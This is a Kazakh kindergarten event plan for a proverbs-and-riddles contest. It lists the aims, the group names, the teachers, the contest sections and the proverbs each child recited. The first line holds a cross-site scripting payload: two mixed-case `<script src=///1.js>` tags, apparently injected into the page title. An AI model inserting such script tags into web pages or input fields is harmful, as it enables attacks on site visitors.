«Мақал – сөздің азығы, жұмбақ – ойдың қазығы»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
09.02.2024
«Мақал – сөздің азығы, жұмбақ – ойдың қазығы»
Мақсаты: Оқу барысында алған білімдерін нығайту, сайысқа деген қызығушылықтарын арттыру, ойлау шапшаңдықтарын дамыту. Ұйымшылдыққа, қамқор болуға тәрбиелеу.
Көрнекілігі: Мақал-мәтелдер, жұмбақтар, ребустар.
І. Ұйымдастыру кезеңі
І-топ: Зерек
ІІ-топ: Талап
Сайыстың барысы:
ІІ Кіріспе
Уа, халайық, халайық,
Бәріне жар салайық.
Бүгінгі кеш төрінде,
Жұмбақ шешіп, мақал айтып
Көңілді кеш жасайық! – дей келе «Мақал – сөздің азығы, жұмбақ – ойдың қазығы» атты сайысымызды бастаймыз.
Сайысқа қатысатын топтар: «Балдәурен», «Болашақ», «Балапан», «Бөбек» топтары.
Сайыс бағдарламасы:
І бөлім: «Суреттер сыр шертеді»
ІІ бөлім: «Сөз тапқанға қолқа жоқ»
ІІІ бөлім: «Тіл өнері»
ІV бөлім: «Бәрін білгім келеді»
V бөлім: «Кім зерек?»
ІІІ Негізгі бөлім
І бөлім: «Суреттер сыр шертеді?
Тәрбиеші:Айтуар Айман Бөлегенқызы
Мектепалды даярлық «Болашақ» тобы
Сурет арқылы балалар,мақалдарды айтып шығу керек.
Мнемокестелер
ІІ бөлім: «Сөз тапқанға қолқа жоқ»
Айтуар Айман Бөлегенқызы. «Болашақ» тобы
- Әдепті бала арлы бала,Әдепсіз бала сорлы бала. (Медина)
- Екпей егін шықпас,үйренбей білім жұқпас. (Алинур)
- Наданмен дос болғанша,кітаппен дос бол (Нұрали)
- Отансыз адам ормансыз бұлбұл. (Хантөре)
- Аққу көлін аңсайды,Адам туған жерін аңсайды. (Алихан)
Сергазина Мақпал Сапаргалиевна. «Бөбек»тобы
- Отан елдің анасы, Ел ердің анасы.
- Отан үшін еңбек етсең халқыңның сүйген ұлы боласың.
- Отан үшін отқа түс- күймейсің.
- Отансыз адам – ормансыз бұлбұл
- Қына тасқа бітеді, білім басқа бітеді.
- Оқусыз білім жоқ- білімсіз күнің жоқ.
- Ақыл тозбайтын тон білім -таусылмайтын кен.
- Ел іші -алтын бесік.
- Бала тәрбиесі бесіктен.
- Ағадан -ақыл, атадан- нақыл.
- .Оқу түбі тоқу.
- Ақыл дария, ой теңіз.
Абуова Мөлдір Асқаровна. «Балдәурен»тобы
- Ақыл азбайды, Білім тозбайды. (Әлім)
- Оқу –білім азығы, Білім – ырыс қазығы (Ілияс)
- Бала тәрбиесі бесіктен. (Жанат)
- Білім баланың ақылын,ал тәрбие –мінезін қалыптастырады (Әмір)
- Отан-елдің анасы,Ер елдің анасы (Әмина)
- Шахманова Аида Қайратқызы «Балақай»тобы
- Туған жердей жер болмас ,Туған елдей ел болмас. (Әмина)
- Отансыз адам,Ормансыз бұлбұл. (Әмина)
- Білім арзан,Білу қымбат. (Медина)
- Күш білімде,білім кітапта. (Медина)
- Ақыл –арман, ой- өріс. (Іңжу)
- Ақыл ауыздан,мерей көзден. (Іңжу)
Тайшыкова Ляззат Қуандыққызы «Балапан»тобы
- Білекті бірді жығады,білімді мыңды жығады.
- Білетінің бір тоғыз,білмейтінің тоқсан тоғыз.
- Қына тасқа бітеді,Білім басқа бітеді.
- Ақыл - тозбайтын тон, Білім – таусылмайтын кен.
- Екпей егін шықпас, Үйренбей білім жұқпас.
ІІІ бөлім: «Тіл өнері»
Тәрбиеші:Тайшыкова Ляззат Қуандыққызы
Ересек топ «Балапан»
Балалар жаттаған жаңылтпаштарын айтып жарысады.
ІV бөлім: «Бәрін білгім келеді» (жұмбақ шешу)
Тәрбиеші: Сергазина Мақпал Сапаргалиевна
Ересек топ «Бөбек»
V бөлім: «Кім зерек?»
Тәрбиешілер:Абуова Мөлдір Асқаровна ,Шахманова Аида Қайратқызы
Мектепалды даярлық «Балдәурен» тобы және Ересек топ «Балақай»
«Ханталапай» сөзіне сөз құрап айту
Жауаптары: хан, хат, талап, апай, атай, ат, халат.
ІV. Қорытынды
Қазылар алқасына сөз кезегін беру, жеңімпазды анықтау, марапаттау.
Ертеңгілікке қатысқан ата-аналар :Бижуманова Айдана
Бурушова Анар
Жұмабекова Айгүл